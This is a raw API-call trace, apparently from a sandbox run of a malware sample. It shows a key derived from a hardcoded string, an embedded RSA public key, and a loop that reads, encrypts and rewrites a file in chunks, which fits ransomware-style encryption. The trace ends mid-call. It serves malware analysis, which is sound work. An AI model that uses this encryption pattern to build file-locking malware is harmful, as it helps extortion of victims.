1 [0275.886] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0275.886] CryptHashData (hHash=0x2fa748, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0275.886] CryptDeriveKey (in: hProv=0x2f2a278, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb2c8) returned 1 [0275.886] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0275.886] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0275.886] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2ad18) returned 1 [0275.886] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ad18, dwCertEncodingType=0x1, pInfo=0x2f33060*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33090*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33098*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb888) returned 1 [0275.886] CryptEncrypt (in: hKey=0x2fb888, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0275.886] CryptEncrypt (in: hKey=0x2fb888, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29db0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29db0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0275.887] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f29db0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29db0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0275.888] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.898] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.898] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.900] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.901] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.901] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.901] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.901] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.902] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.902] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.902] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.902] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.902] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.903] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.903] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.903] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.903] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.903] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.903] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.903] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.903] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.903] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.903] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.903] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.904] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.904] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.904] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.904] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.904] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.904] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.905] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.905] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.905] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.905] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.905] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.906] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.906] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.906] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.906] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.906] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.907] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.907] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.907] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.907] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.907] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.908] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.908] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.908] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.908] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.908] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.908] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.908] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, 